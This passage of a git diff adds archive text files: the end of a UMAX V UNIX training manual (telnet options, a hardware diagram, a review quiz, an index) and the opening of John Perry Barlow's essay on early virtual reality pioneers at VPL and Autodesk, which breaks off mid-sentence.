character is typed, a TELNET AO sequence (see + send ao above) is sent to the remote host. + The initial value for the flush character is + taken to be the terminal's flush character. + + erase + If telnet is in localchars mode (see toggle + localchars below), and if telnet is operating + in character at a time mode, then when this + character is typed, a TELNET EC sequence (see + send ec above) is sent to the remote system. + The initial value for the erase character is + taken to be the terminal's erase character. + kill + If telnet is in localchars mode (see toggle + localchars below), and if telnet is operating + in character at a time mode, then when this + character is typed, a TELNET EL sequence (see + send el above) is sent to the remote system. + The initial value for the kill character is + taken to be the terminal's kill character. + + eof + If telnet is operating in line by line mode, + entering this character as the first character + on a line will cause this character to be sent + to the remote system. The initial value of + the eof character is taken to be the + terminal's eof character. + + toggle arguments ... + Toggle (between TRUE and FALSE) various flags that + control how telnet responds to events. More than + one argument may be specified. The state of these + flags may be interrogated with the display command. + Valid arguments are: + + localchars + If this is TRUE, then the flush, interrupt, + quit, erase, and kill characters (see set + above) are recognized locally, and transformed + into (hopefully) appropriate TELNET control + sequences (respectively ao, ip, brk, ec, and + el; see send above). The initial value for + this toggle is TRUE in line by line mode, and + FALSE in character at a time mode. + + autoflush + If autoflush and localchars are both TRUE, + then when the ao, intr, or quit characters are + recognized (and transformed into TELNET + sequences; see set above for details), telnet + refuses to display any data on the user's + terminal until the remote system acknowledges + (via a TELNET Timing Mark option) that it has + processed those TELNET sequences. The initial + value for this toggle is TRUE if the terminal + user had not done an stty noflsh, otherwise + FALSE (see stty(1)). + + autosynch + If autosynch and localchars are both TRUE, + then when either the intr or quit characters + is typed (see set above for descriptions of + the intr and quit characters), the resulting + TELNET sequence sent is followed by the TELNET + SYNCH sequence. This procedure should cause + the remote system to begin throwing away all + previously typed input until both of the + TELNET sequences have been read and acted + upon. The initial value of this toggle is + FALSE. + crmod + Toggle carriage return mode. When this mode + is enabled, most carriage return characters + received from the remote host will be mapped + into a carriage return followed by a line + feed. This mode does not affect those + characters typed by the user, only those + received from the remote host. This mode is + not very useful unless the remote host only + sends carriage return, but never line feed. + The initial value for this toggle is FALSE. + + debug + Toggles socket level debugging (useful only to + the super-user). The initial value for this + toggle is FALSE. + + options + Toggles the display of some internal telnet + protocol processing (having to do with TELNET + options). The initial value for this toggle + is FALSE. + + netdata + Toggles the display of all network data (in + hexadecimal format). The initial value for + this toggle is FALSE. + + ? + Displays the legal toggle commands. + +SEE ALSO + csh(1), ksh(1), rlogin(1N). + inet(3N), services(4), hosts(4) in the UMAX V Programmer's + Reference Manual. + telenetd(1M) in the UMAX V Administrator's Reference Manual. + +BUGS + There is no adequate way for dealing with flow control. + On some remote systems, echo has to be turned off manually + when in line by line mode. + + There is enough settable state to justify a .telnetrc file. + + No capability for a .telnetrc file is provided. + + In line by line mode, the terminal's eof character is only + recognized (and sent to the remote system) when it is the + first character on a line. +APPENDIX M: domax1 AND domax0 HARDWARE CONFIGURATION + + + ÚÄÄÄÄÄÄÄÄÄ¿ + ³Cassette ³ + ³ Drive ³ + ³ ³ ÚÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄ¿ + ÀÄÄÄÄÂÄÄÄÄÙ ³ Disk ³ ³ Disk ³ + ³ ³ Drive ³ ³ Drive ³ + ³ ³ ³ ³ ³ +ÚÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÀÄÄÄÄÄÄÄÂÙ ÀÄÂÄÄÄÄÄÄÙ +³ Tape ÃÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +³ Drive ³ ³ ³ +ÀÄÄÄÄÄÄÄÄÙ ³ 4 X 2 MIP ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄ +ÚÄÄÄÄÄÄÄÄ¿ ³ ³ +³ Tape ³ ³ Multimax 310 ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄ +³ Drive ÃÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ +ÀÄÄÄÄÄÄÄÄÙ ³ ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ÀÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÙ ³ Port ³ + ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Selector ³ + ³ ÃÄÄÄÄÄÄÄÄ´ Console ³ ³ ³ + ³ ÚÄÄÄÄÁÄÄÄÄÄÄ¿ ³ Hardcopy ³ ÀÄÂÄÄÂÄÄÂÄÄÂÄÄÂÙ + ³ ³ Console ³ ³ ³ ³ ³ ³ ³ ³ 32 Lines + ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÁÄÄÁÄÄÁÄÄÁÄÄÁ¿ + ³ ³ CRT ³ ³ ³ + ³ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ³ Annex 01 ³ + ³ ³ ³ + ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÙ +Ethernet ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + ÚÄÄÄÄÄÁÄÄÄÄÄ¿ + ³ Annex 00 ³ + ³ ³ + ÀÄÄÂÄÄÄÄÄÂÄÄÙ + ÚÄÄÄÄÄÄÄÄÁÄ¿ ÚÄÁÄÄÄÄÄÄÄÄ¿ + ³ mtlzr ³ ³ mt_600 ³ + ³ ³ ³ ³ + ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÙ + + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +APPENDIX N: BASIC UNIX REVIEW + + +Write the letter(s) of the UNIX component that best fit each +description. + + +K = Kernel S = Shell U = Utilities D = Directory + + +_____ 1. Uses standard syntax for all commands. + +_____ 2. Schedules tasks and manages data storage. + +_____ 3. Memory resident code. + +_____ 4. Main interface between UNIX and users. + +_____ 5. Heart of the operating system. + +_____ 6. Can be easily combined to perform the exact + function which the user desires. + +_____ 7. Path name concept. + +_____ 8. Written mostly in the "C" programming language. + +_____ 9. Multi-level directory structure. + +_____ 10. Uses pipes and filters. + +_____ 11. Supports control structures. + +_____ 12. Includes text processing, electronic mail, file + manipulation, and program generation. + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ + INDEX + + +. (dot)..................................................................................63 +.. (dot dot).............................................................................63 +Access modes.............................................................................37 +Annex Commands + call..............................................................................16 + hangup............................................................................21 +BourneShell prompt........................................................................6 +BSD UNIX..................................................................................2 +Current working directory................................................................63 +Expiration period........................................................................19 +FTP Commands............................................................................108 + !................................................................................116 + ?................................................................................123 + cd...............................................................................119 + close............................................................................121 + get remote-file..................................................................113 + help.............................................................................123 + lcd..............................................................................115 + ls...............................................................................120 + open host........................................................................109 + Password.........................................................................110 + put..............................................................................117 + quit.............................................................................122 + status...........................................................................124 +Kernel...................................................................................33 +KornShell.................................................................................2 +Mailx Commands...........................................................................74 + ?.................................................................................82 + d.................................................................................80 + S.............................................................................77, 78 +MICOM....................................................................................14 +Number links.............................................................................37 +On-line manual pages.....................................................................25 +Ownership and group affiliation..........................................................37 +Parent...................................................................................64 +Password.................................................................................19 +Pathname.................................................................................57 +PROCOMM+.................................................................................14 +Protections..............................................................................34 +Redirection..........................................................................94, 95 +Root directory............................................................................4 +Scrolling................................................................................10 +Shell.....................................................................................1 +Standard input...........................................................................93 +Standard output..........................................................................93 +Subdirectory.............................................................................61 +System V UNIX.............................................................................2 +TAB.....................................................................................153 +TCP/IP..................................................................................107 +Terminal nodes............................................................................3 +UMAX.....................................................................................19 +UNIX Commands + assist...........................................................................151 + cancel............................................................................48 + cat...............................................................................40 + cd................................................................................61 + chmod.............................................................................35 + cp............................................................................49, 50 + exit..............................................................................20 + file..............................................................................39 + lp................................................................................45 + lpstat............................................................................47 + ls................................................................................37 + mkdir.............................................................................58 + mv................................................................................62 + pg................................................................................42 + pwd...............................................................................57 + rmdir.............................................................................59 + tail..............................................................................43 +UNIX filesystem...........................................................................3 +UNIX Keyboard Function Commands + #..................................................................................9 + @..................................................................................9 + Ctrl-D............................................................................20 + Ctrl-Q............................................................................10 + Ctrl-S............................................................................10 + Delete............................................................................10 + Hold Screen.......................................................................10 +UNIX Primer Plus........................................................................153 +vi Commands + :!shell-cmd......................................................................147 + :q!..............................................................................145 + :r !shell-cmd....................................................................147 + :r filename......................................................................147 + :w...............................................................................145 + :w newfile.......................................................................147 + :wq..............................................................................146 +Wildcards...............................................................................100 + \ No newline at end of file diff --git a/textfiles.com/computers/being.txt b/textfiles.com/computers/being.txt new file mode 100644 index 00000000..ba1ad3f4 --- /dev/null +++ b/textfiles.com/computers/being.txt @@ -0,0 +1,769 @@ + +90-02/BeingInNothingness + +BEING IN NOTHINGNESS +Virtual Reality and the Pioneers of Cyberspace + +By John Perry Barlow +Published in Microtimes Magazine + +"Cyberspace. A consensual hallucination experienced daily +by billions of legitimate operators, in every nation...A +graphic representation of data abstracted from the banks of +every computer in the human system. Unthinkable +complexity. Lines of light ranged in the nonspace of the +mind, clusters and constellations of data. Like city lights, +receding..." + --William Gibson, Neuromancer + +Suddenly I don't have a body anymore. + +All that remains of the aging shambles which usually constitutes my +corporeal self is a glowing, golden hand floating before me like +Macbeth's dagger. I point my finger and drift down its length to the +bookshelf on the office wall. + +I try to grab a book but my hand passes through it. + +"Make a fist inside the book and you'll have it," says my invisible +guide. + +I do, and when I move my hand again, the book remains embedded in +it. I open my hand and withdraw it. The book remains suspended +above the shelf. + +I look up. Above me I can see the framework of red girders which +supports the walls of the office...above them the blue-blackness of +space. The office has no ceiling, but it hardly needs one. There's never +any weather here. + +I point up and begin my ascent, passing right through one of the +overhead beams on my way up. Several hundred feet above the office, +I look down. It sits in the middle of a little island in space. I +remember the home asteroid of The Little Prince with its one volcano, +it's one plant. + +How very like the future this place might be: a tiny world just big +enough to support the cubicle of one Knowledge Worker. I feel a wave +of loneliness and head back down. But I'm going too fast. I plunge +right on through the office floor and into the bottomless indigo below. +Suddenly I can't remember how to stop and turn around. Do I point +behind myself? Do I have to turn around before I can point? I flip into +brain fugue. + +"Just relax," says my guide in her cool clinical voice. "Point straight +up and open your hand when you get where you want to be." + +Sure. But how can you get where you want to be when you're coming +from nowhere at all? + +And I don't seem to have a location exactly. In this pulsating new +landscape, I've been reduced to a point of view. The whole subject of +"me" yawns into a chasm of interesting questions. It's like Disneyland +for epistomologists. "If a virtual tree falls in the computer-generated +forest..?" Or "How many cybernauts can dance on the head of a +shaded solid?" Gregory Bateson would have loved this. Wittgenstein, +phone home. + +At least I know where I left my body. It's in a room called Cyberia in a +building called Autodesk in a town called Sausalito, California. Planet +Earth. Milky Way. So on and so forth. My body is cradled in its usual +cozy node of space-time vectors. + +But I...or "I"...am in cyberspace, a universe churned up from computer +code by a Compaq 386 and a pair of Matrox graphics boards, then fed +into my rods and cones by VPL Eyephones, a set of goggles through +whose twin, parallax-corrected video screens I see this new world. + +When I move my head, the motion is tracked by a a Polhemus +magnetic sensor and the imaging engine of cyberspace is instructed to +alter what I see accordingly. Thus, having made a controlled ascent +back up through the floor of the "office," I turn to the left and I see red +chair with a desk behind it. I turn to the right and I see a door leading +out onto the floating platform. + +The configuration and position of my right hand is fed into the system +by a VPL DataGlove, also with an Polhemus attached to it. The +relationship between my hand and the eyephones is precisely +measured by the two trackers so that my hand appears where I would +expect it to. When I point or make a fist, the fiber optics sewn into the +DataGlove convert kinesthetics into electronics. For a decisecond or so, +my hand disappears and then reappears, glowing and toon-like, in the +appropriate shape. + +Despite the current confines of my little office-island, I know that I +have become a traveller in a realm which will be ultimately bounded +only by human imagination, a world without any of the usual limits of +geography, growth, carrying capacity, density or ownership. In this +magic theater, there's no gravity, no Second Law of Thermodynamics, +indeed, no laws at all beyond those imposed by computer processing +speed...and given the accelerating capacity of that constraint, this +universe will probably expand faster than the one I'm used to. + +Welcome to Virtual Reality. We've leapt through the looking glass. +Now what? Go ask Alice. + + + + + +The Next Big Thing +Money from Nuthin' + +"I think this is the biggest thing since we landed on the Moon," says +Jaron Lanier, the dread-locked CEO of VPL Research. (Who was 9 +years old at that time.) I don't choke on that one. Indeed, I'd take it a +bit farther, guessing that Columbus was probably the last person to +behold so much usable and unclaimed real estate (or unreal estate) as +these cybernauts have discovered. + +At Autodesk, the Sausalito publisher of AutoCAD drafting software, +they spent the summer of T89 in product development heaven, talking +telephone, automobile, airplane, computer. They invoked Edison, Bell, +Ford, and Jobs. And there was that loincloth-and-machete sense of +enterprise which one might have experienced in the Wright Brothers' +Akron Bicycle Shop or Paul Jobs' garage in Mountain View...as well as +countless less-chronicled shots at perpetual motion or baldness cures. + +Neil Armstrong's small step ran about 70 Billion Real Dollars, but +when John Walker, the Hacker King of Autodesk, committed his +company to creating the first commercially-available "world in a can," +he figured that the prototype "gizmo" could be built for about $25,000. + +VPL, the other trading post on VR frontier, isn't much fatter, although +internal synergy seems to magnify output. Since their incorporation in +1985, they've had two Scientific American covers and produced the +DataGlove, DataSuit, the PowerGlove, Swivel 3-D and VPL +EyePhones, the only commercially available head-mounted display. +They've been in a couple of big lawsuits (one, just concluded to their +satisfaction, with Stanford University), and create, at a distance, the +mirage of a fair-sized company going at it pretty hard. + +But up close, one can get on a first-name basis with every VPL +employee in the course of an afternoon. They have yet to outgrow the +third floor of their slightly tacky building at the Redwood City yacht +harbor. + +While Apple's research gazillions yield such dubious fruit as +multimedia and the AppleFax Modem, while IBM replicates methods +for chaining bureaucrats to its mainframes, it begins to appear that the +Next Big Thing will begin its commercial evolution as humbly as the +personal computer. + +As usual, the Big Guys have neither the means nor the desire to engage +in such open-ended creation as settling the virtual universe will +require. Like the Union Pacific Railroad awaiting the fact of empire, +they prefer to let the rag-tag pioneers die all over the frontier before +they come out to claim it. + +When the Altairs and Osbornes of Virtual Reality have made their fatal +errors are headed for Chapter 11, IBM probably will issue forth the +SolutionStation VR Network or some such and accelerate natural +selection in the field. + +But as I write this, VPL and Autodesk still have it to themselves. +Actually, they are not the first to make virtual landfall. They are only +the first at financial risk. Unlike the first automobiles or telephones +their commercial fledglings had the advantage of long incubation by +government and Academia. + +Virtual Reality, as a concept, found first form at the University of Utah +over twenty years ago in the fecund cranium of Ivan E. Sutherland, the +godfather of computer graphics and the originator of about every Big +Computer Idea not originated by Alan Kay or Doug Englebart. In +1968, he produced the first head-mounted display. This was the +critical element in VR hardware, but it was so heavy that it had to be +suspended from the ceiling...at some peril to its wearer. Damocles was +mentioned. + +Besides, once you got it on, there wasn't much to see in there. There +wasn't a computer in existence which could churn out enough +polygons per second to simulate a reality much more full-bodied than +a game of Pong. + +So Virtual Reality passed a generation waiting for the equipment to +arrive. In 1985 the Japanese finally (and unintentionally) provided us +with the right video displays when NASA's Mike McGreevy happened +to notice that the Citizen Watch Co. LCD displays in a Radio Shack +mini-TV were small enough to fit two in a head-mounted. + +I hardly need to detail what happened to CPU horsepower during that +period. By 1985, graphics engines of appropriate juice were almost +within financial range of entities not involved in the defense of our +nation. + +Also by this time, NASA had made a strong commitment to VR +research, though mostly in the service of "telepresence," the ability to +project one's judgement and actions into a robot located some real +place you'd rather not be, like space. They were less persuaded by the +attractions of unreal places. + +The Air Force was also conducting research at Wright-Patterson under +the direction of Tom Furness, but most of this was directed at the usual +dismal purpose, simplifying the annihilation of non-virtual humans. +Heads up displays and looks that kill were their speciality. + +For all this expenditure of tax dollars, Virtual Reality still lacked two +critical elements: a sense of whimsy and a fluid, three-dimensional +method for "grabbing" and manipulating the furniture of cyberspace. +VPL was on the case. + +VPL's Tom Zimmerman had always wanted the ability to actually play +air guitar. It was the sort of desire his "boss," Jaron Lanier, could +understand. Jaron had only gotten into computers after concluding +that musical composition was not a reliable day job. And his +ownership of more than 300 musical instruments might indicate, if +nothing else, a probing dissatisfaction with the limits of each one. + +Over a two year period, Zimmerman and Young Harvill (also of VPL) +created the DataGlove, a hand with which to strum those invisible +strings. While they were creating this hardware interface (though the +Spandex feel of the DataGlove makes "leisureware interface" seem like +a more appropriate term), Jaron and Chuck Blanchard were writing +Body Electric, the software necessary to map the actual movements of +the DataGlove and eyephones onto the virtual landscape. + +The commercial colonization of cyberspace was beginning. VPL's +strategy was to build the most powerful simulations current +technology would allow, without regard to hardware cost, selling the +spin-offs at increasingly affordable prices. Once such item, the +PowerGlove, is a Nintendo game controller based on the DataGlove +which VPL has licensed to Mattel. (Available this Christmas at a store +near you for $85.00.) + +Another VPL spin-off product is Swivel 3-D, odds on the best 3-D +modeler for the Macintosh. Young Harvill wrote it as a tool to create +an artificial reality quickly and easily on Mac before integrating it into +Body Electric and sending it over the twin Silicon Graphics CPUs +which blow it up to full size. + +In September of 1988, John Walker wrote an internal Autodesk white +paper called Through the Looking Glass: Beyond "User Interfaces." In it +he proposed an "Autodesk Cyberpunk Initiative" to produce within 16 +months a doorway into cyberspace...available to anyone with $15,000 +and a 386 computer. The project's motto: "Reality Isn't Enough Any +More." (I wondered if they considered: "I'd rather have a computer in +front of me than a frontal lobotomy...") + +Since NASA's Virtual Realities were running in the millions and VPL's +in the middle hundreds of thousands, Walker envisioned a significant +discount over previous models, but he knew that his customers, if any, +would be more bargain-conscious than, say, the U.S. Air Force. + +Autodesk's Cyberia Project was running hard by Christmas, 1988, +staffed by William and Meredith Bricken, Eric Gullichsen, Pat Gelband, +Eric Lyons, Gary Wells, Randy Walser, and John Lynch. When I +arrived on the scene in May, they had been keeping hacker's hours for +a long time. + +And they were ready to make a product. They'd made a promo video +starring Timothy Leary. Gullichsen had even registered William +Gibson's term "cyberspace" as an Autodesk trademark, prompting an +irritated Gibson to apply for trademark registration of the term "Eric +Gullichsen." By June, they had an implementation which, though +clearly the Kitty Hawk version of the technology, endowed people +with an instantaneous vision of the Concorde level. + +Meanwhile, back in the real world, things were getting complicated. +While everyone who went to Autodesk's Cyberia agreed that Virtual +Reality was something, there was less agreement as to what. + +Part of the problem was the scale of possibilities it invoked. They +seemed to be endless and yet none of them was anywhere near ready +to return an investment. But when something has endless possibilities, +each of them is liable to dilute down to a point where people start to +say things like, "Sure, but what's it really good for." At which point the +devoted cybernut might lapse into random syllables, his tongue heavy +with all that golden potential. + +Virtual Reality induces a perception of huge potency underlying +featureless ambiguity. There is a natural tendency to fill this gap +between power and definition with ideology. And the presence of +such unclaimed vastness seems to elicit territorial impulses from +psychic regions too old to recognize the true infinity of this new +frontier. Disputes appeared like toadstools in the rich new soil of +cyberspace. + +Thus, by mid-November, the Autodesk half of the Next Big Thing was +down to one full-time hacker: Randy Walser. The Brickens had headed +to Seattle to join Tom Furness in a (non-lethal) VR research program at +the University of Washington. Eric Gullichsen and Pat Gelband had +formed their own VR company, Sense 8. (Get it?) + +Within, VPL's soulful band remained as tightly bonded as a Hell's +Angels chapter. Without, they found themselves increasingly tangled +in legal hassles. They were in court with AGE (a group of New York +toy developers who are not just in it for their health), trying to protect +their rights to the PowerGlove. They'd just settled a suit with Stanford +University. In general, they were having experiences which made me +question the axiom that you can't cheat an honest man. + +Still, everyone realized that a baby this size would be bound to +occasion some labor pains. As the general media began to pick up on +Virtual Reality, its midwives were preparing themselves for interesting +times. It would be worth it. But why? + +To the people who will actually make the future, such a question is +beside the point. They will develop cyberspace because, like Mallory's +mountain, it's there. Sort of. + + + + + +There some practical reasons for the settlement of cyberspace. They +aren't as much fun to think about as the impractical ones, but they +exist. First among them is that this is the next logical step in the quest +to eliminate the interface...the mind-machine information barrier. + +Over the last twenty years, our relations with these magic boxes have +become intimate at a rate matched only by the accelerating speed of +their processors. From the brutal austerity of batch-processed punch- +cards to the snuggly Macintosh, the interface has become far less +cryptic and far more interactive. + +There have remained some apparently unbreachable barriers between +us and the CPU. One of them was the keyboard, which even with the +graphical interface and the accompanying infestation of mice, +remained the principal thoroughfare from human perception to RAM. +The thin alphanumeric stream which drips from our fingertips and +into the computer is a pale reflection of the thoughts which produce it, +arriving before the CPU at a pace absurdly mis-matched to its +chewing/spitting capacities. + +Then there is the screen itself. While a vast improvement on the +flickering LED's of the Altair or even the amber text of DOS, the +metaphorical desktop remains flat as paper. There is none of the depth +or actual spatiality of experience. + +After we get past what few documents we can keep on the screen at +one time, we are back to the alphabetized hierarchy. We can't pile it, +as most of us tend to do in real life. We have to file it. And this is not + +the way the mind stores information. One doesn't remember the +names of his friends alphabetically. When looking for a phase in a +book, you are more likely to look for its spatial position on the page +than it's intellectual position in context. + +The actual operation of human memory works on a model more like +the one Saint Thomas Aquinas used. Aquinas, who carried around in +his head almost all the established knowledge of his simpler world, is +said to have imagined a mind-castle with many different rooms in +which varying kinds of ideas dwelled. The floor plan increased with +his knowledge. + +Nicholas Negroponte recreated a modest version of Aquinas' castle in +the 70's. He came up with a virtual office, represented in cartoon form +on the screen. One could mouse around to the "piles" of "paper" +stacked on the "desk" or "filing cabinet," leafing through them not by +the first letter of their subject name but by their archaeological layer of +deposition. + +The problem was the screen. Negroponte created a flat picture of an +office rather than something more like the real thing because that was +all one could display on a screen. In two dimensions, the image of +desktop seemed a lot more natural than the image of the desk. Thence +the Macintosh. + +I used to think that the only way around these narrow I/O apertures +lay in such heroic solutions as brain implants. I think I was about 14 +when it occurred to me that this was the answer. Brain surgery +seemed a minor nuisance if it left one with the ability to remember +everything. + +I suppose I'd still be willing to put a Cray in my cranium, but my faith +in technology has moderated since early adolescence. I'm more +comfortable with the possibility of an interface which fills the gap +between keyboarding and neurological hardwiring and involves no +cortical knife-play. Virtual Reality is almost certainly that. + +And indeed, Virtual Reality may be so close to the implant side of the +continuum that, as Randy Walser of Autodesk insists, it's not even +appropriate to call it an interface. It more a place...kind of like Fibber +McGee's Ultimate Closet...than the semi-permeable information +membrane to which we're accustomed. + +Whatever you want to call it, Autodesk's John Walker puts it this way, +"If cyberspace truly represents the next generation of human +interaction with computers, it will represent the most profound change +since the development of the personal computer." Right. + +But that still doesn't tell us what it's good for besides extending human +quirkiness to the storage of immaterial stuff. After all, most of what +humans do with computers is merely an improvement over what they +did with other keyboard-bound devices, whether typewriters or +calculators. Word processing and numerical analysis will be no easier +"inside" the machine than it was outside. + +But let's quit being giddy for a moment. We're talking bucks here. +Right now a good working platform costs almost as much as a CAT +scanner. Who's going to buy one without something like Blue Cross +footing the bill? And why? + +Alright, there is a reason why Autodesk is involved in this enterprise +besides some daydream of the Ultimate Hack. Whatever adventures +they might entertain they afford by selling AutoCAD, the Dbase III of +architecture. How many architects have dreamed of the ability to take +their clients on a walk inside their drawings before their +miscommunications were sealed in mortar? + +Virtual Reality has already been put to such use at the University of +North Carolina. There Sitterman Hall, the new $10 million home of +UNC's computer science department, was designed by virtual means. + +Using a head-mounted display along with a handlebar-steerable +treadmill, the building's future users "walked through" it, discovering, +among other things, a discomforting misplacement of a major interior +wall in the lobby. At the point of the discovery, moving the wall out +was cheap. A retrofit following the first "real" walk-through would +have cost more by several orders of magnitude. Thus, one can imagine +retrofit savings from other such examples which could start to make +DataSuits as common a form of architectural apparel as chinos and +tweed. + +Given the fact that AutoCAD is already generating about a hundred +seventy million dollars a year even without such pricy appurtenances +as cyberspace design tools, it isn't hard to imagine a scenario in which +developing workstations for virtual architecture comes to look like +very shrewd business. + +Then there is the burgeoning scientific market. Computers are the new +microscopes. Increasingly, they allow us to see into worlds which are +not only too small but too weird to bring to human scale before. For +example, they are showing us the infinitely detailed order of chaos, +never before observable, in a form which makes it possible to +appreciate its simplicity as well as its complexity. + +Virtual Reality promises the ability to not only see but to "touch" +forbidden realms. Again at UNC, work is already quite advanced in +which one can assemble complex molecules like Tinkertoys, the +attraction or repulsion between individual atoms in the assembly +modelled to the scale of human tactile perceptions. The drug industry +alone could have uses for such capacity sufficient to sustain a lot of +CyberBiz. + +One can imagine a lot of heretofore inaccessible "places" in which +one's presence might be scientifically illuminating. A Fantastic Voyage +through the circulatory system will become possible (with or without +Raquel Welch). Or travel to alien worlds. (Thanks to JPL, I have +already taken an extremely convincing helicopter ride down the Vallis +Marinaris on Mars.) + +Then there all the places which have never before had physical +existence on any scale: the rolling plains of mathematical topologies, +the humming lattice of quantum states, cloud chambers in which mu +mesons are the size of basketballs and decay over weeks rather than +picoseconds. + +The possibility for less sober uses seems equally fertile. One can +imagine VR salons, video game parlors for big kids with Gold Cards, +in which a central supercomputer provides the opportunity for a score +of people to be Ms. Pacman. Or whatever. Nolan Bushnell, the +founder of Atari and something of an expert on the subject of video +games, is already at work on something like this. + +The list of possibilities is literally bounded only by the imagination. +Working bodies for the damaged. Teleconferencing with body +language. Virtual surgery. Hey, this is a practical thing to do! + +And yet I suspect that something else altogether, something not so +practical, is at the root of these yearnings. Why do we really want to +develop Virtual Reality? There seems to be a flavor of longing here +which I associate with the desire to converse with aliens or dolphins or +the never-born. + +On some level, I think we can now see the potential for technology, +long about the business of making the metaphorical literal, of reversing +the process and re-infecting ordinary reality with luminous magic. + +Or maybe this is just another expression of what may be the third +oldest human urge, the desire of have visions. Maybe we want to get +high. + + + +Drugs, Sex, & Rock Tn' Roll +Boot Up, Jack In, Get Virtual + +Technology is the new drugs. + + Jerry Garcia + +Knowing that Garcia is a sucker for anything which might make a +person question all he knows, I gave him a call not long after my first +cyberspace demo. Hell yes, he was interested. When? If I'd told him +6:00 AM, I think he'd have been there on time. + +He adapted to it quicker than anyone I'd watched other than my 4 year +old daughter Anna (who came home and told her sisters matter-of- +factly that she been to a neat "place" that afternoon.) + +By the time he crossed back over to our side of Reality Horizon, he was +pretty kid-like himself. "Well," he finally said, "they outlawed LSD. +It'll be interesting to see what they do with this." + +Which brings me to a point which makes Jaron Lanier very +uncomfortable. The closest analog to Virtual Reality in my experience +is psychedelic, and, in fact, cyberspace is already crawling with +delighted acid heads. + +The reason Jaron resents the comparison is that it is both inflammatory +(now that all drugs are evil) and misleading. The Cyberdelic +Experience isn't like tripping, but it is as challenging to describe to the +uninitiated and it does force some of the same questions, most of them +having to do with the fixity of reality itself. + +While you can hardly expect people to lay down $15,000 for something +just because it shakes their basic tenets, that's enough to make it worth +the trip for me. I think the effort to create convincing artificial +realities will teach us the same humbling lesson about reality which +artificial intelligence has taught us about intelligence...namely, that we +don't know a damned thing about it. + +I've never been of the cut-and-dried school on your Reality Question. I +have a feeling VR will further expose the conceit that "reality" is a fact. + +It will provide another reminder of the seamless continuity between +the world outside and the world within delivering another major hit to +the old fraud of objectivity. RTReal'," as Kevin Kelly put it, "is going +to be one of the most relative words we'll have." + +And that's just fine with me, since so much of what's wrong in +America is based on the pathological need for certainty and the idiotic +delusion that such a condition can even exist. + +Another reason for relating this to acid is the overwhelming sense of its +cultural scale. It carries with it a cosmic titillation I haven't +experienced since 1966. There is also the same dense shower of +synchronicities surrounding it. (I must have run into William and +Meredith Bricken ten times, always unexpectedly and sometimes in the +strangest of places. Today, as I was typing his name, Jaron called me +for the first time in three weeks. Then I felt strangely moved to call +Eric Gullichson after a couple of months of silence. He told me that +yesterday had been his last day at Autodesk. Etc. Etc. Etc.) + +Finally, Timothy Leary is all excited again. Now I don't endow every +one of his pronouncements with oracular qualities...I remember the +Comet Starseed... but I have always thought that Uncle Tim is kind of +like a reverse of the canary in the coal mine. Whenever the culture is +about to make a big move, he's the first canary to start jumping up and +down. + +He's also, like Zelig, a kind of Zeitgeist chameleon. He spent the 40's in +the Army. In the 50's, he was a tweedy young college professor, a +Jules Feiffer cartoon. In the 60's, he was, well, Timothy Leary. In the +70's, he became, along with H. R. Haldeman, a political prisoner. He +lived up the material 80's in Beverly Hills. Whatever America is about +to do, Tim starts doing it first. + +When I visited him recently, he was already as cyberpunk as he had +been psychedelic when I last saw at Millbrook 22 years ago. Still, his +current persona seems reasonable, even seraphic. He calmly scored a +long list of persuasive points, the most resonant of which is that most +Americans have been living in Virtual Reality since the proliferation of +television. All cyberspace will do is make the experience interactive +instead of passive. + +"Our brains are learning how to exhale as well as inhale in the data- +sphere." he said. Like our finny ancestors crawling up on land, we are +about to be come amphibians again, equally at home in visceral and +virtual frames. + +The latest bus is pulling out of the station. As usual, Leary has been on +it for a while, waiting patiently for it to depart. + + + +Then there is the...uhhhm...sexual thing. I have been through eight or +ten Q. & A. sessions on Virtual Reality and I don't remember one +where sex didn't come up. As though the best thing about all this will +be the infinite abundance of shaded polygonal party dolls. As though +we are devising here some fabulously expensive form of Accu-jac. + +This is strange. I don't what to make of it, since, as things stand right +now, nothing could be more disembodied or insensate than the +experience of cyberspace. It's like having had your everything +amputated. You're left mighty under-endowed and any partner +would be so insubstantial you could walk right through her without +either of you feeling a thing. (In fact, when people play tag in Jaron's +Reality Built for Two, one strategy is to hide inside the other person's +head.) + +And I did overhear the word "DataCondom" at one point... Maybe the +nerds who always ask this question will get a chance to make it with +their computers at long last. (I prefer not to think too much of how +anyone who would want to make it with a machine might treat the +women in their lives...if any there be.) + +Fortunately, I think these dreams of cybersex will be thwarted 